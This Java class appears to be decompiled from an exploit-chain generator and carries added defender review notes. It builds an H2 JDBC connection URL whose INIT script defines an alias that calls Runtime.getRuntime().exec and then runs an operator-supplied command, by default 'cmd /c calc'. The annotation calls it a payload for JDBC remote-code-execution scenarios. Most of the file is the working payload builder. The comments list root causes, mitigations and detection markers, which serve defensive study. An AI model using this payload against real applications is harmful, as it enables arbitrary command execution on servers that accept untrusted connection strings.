package com.ar3h.chains.gadget.impl.common.jdbc.h2;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;

/**
 * Gadget that renders an H2 JDBC connection URL carrying an {@code INIT} script.
 *
 * <p>The URL addresses an in-memory database ({@code jdbc:h2:mem:testdb}). Its {@code INIT}
 * setting holds two SQL statements: a {@code CREATE ALIAS} whose body is Java source that calls
 * {@code Runtime.getRuntime().exec(cmd)}, and a {@code CALL} of that alias with {@link #cmd}.
 * H2 runs {@code INIT} statements when the connection is opened, so the URL only has an effect
 * where an application hands an attacker-influenced connection string to the H2 driver. The
 * annotation text describes the same thing: a short payload for "JDBC RCE" scenarios.
 *
 * <p>Review notes for defenders:
 * <ul>
 *   <li>Root cause on the target side is a JDBC URL (or data-source configuration) that
 *       untrusted input can set. Build connection strings from fixed configuration, or
 *       allowlist the permitted URL form and reject any extra settings such as {@code INIT}.</li>
 *   <li>Recognisable markers in this URL are {@code INIT=}, {@code CREATE ALIAS} and
 *       {@code TRACE_LEVEL_SYSTEM_OUT=3}; they are useful as log and input-filter signatures,
 *       though only for this exact variant.</li>
 *   <li>The dependency string in the annotation names {@code org.h2.Driver}, so the H2 driver
 *       has to be on the target classpath; removing H2 where it is not needed removes the
 *       exposure.</li>
 * </ul>
 */
@GadgetAnnotation(name = "H2 JDBC URL Java命令执行1", description = "适用于jdbc rce场景，通过H2执行Java代码，这里采用了最简单的getRuntime去执行命令，Payload比较简短", dependencies = {"com.h2database:h2:org.h2.Driver"}, priority = 10)
@GadgetTags(tags = {Tag.H2JdbcUrl, Tag.JdbcUrlChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/h2/H2JavaExecJdbc1.class */
public class H2JavaExecJdbc1 implements Gadget {

    // Command text spliced into the CALL statement; exposed as a tool parameter via @Param.
    // NOTE(review): inserted verbatim, with no quoting or escaping applied by this class.
    @Param(name = "命令", description = "eg: cmd /c calc")
    public String cmd = "cmd /c calc";

    // Driver class name published to the gadget context by invoke().
    public String driverClassName = "org.h2.Driver";

    /**
     * Assembles the JDBC URL from a fixed prefix, the current {@link #cmd} value and a fixed
     * suffix.
     *
     * <p>The {@code \;} sequences keep the semicolons inside the {@code INIT} value, so that they
     * do not end the {@code INIT} setting where a bare {@code ;} would.
     *
     * @return the complete JDBC URL string
     */
    public String getObject() {
        // Everything up to the opening quote of the CALL argument.
        final String urlPrefix = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL EXEC ('";
        // Closes the CALL argument and terminates the statement.
        final String urlSuffix = "')\\;";
        return urlPrefix + this.cmd + urlSuffix;
    }

    /**
     * Records the driver class name in the context, then returns the generated URL.
     *
     * @param gadgetContext context that receives {@link #driverClassName} under
     *     {@code ContextTag.DRIVER_CLASS_NAME_KEY}
     * @param gadgetChain not used by this gadget
     * @return the JDBC URL produced by {@link #getObject()}
     * @throws Exception declared by the {@code Gadget} interface; nothing here throws explicitly
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        final String jdbcUrl = getObject();
        return jdbcUrl;
    }
}
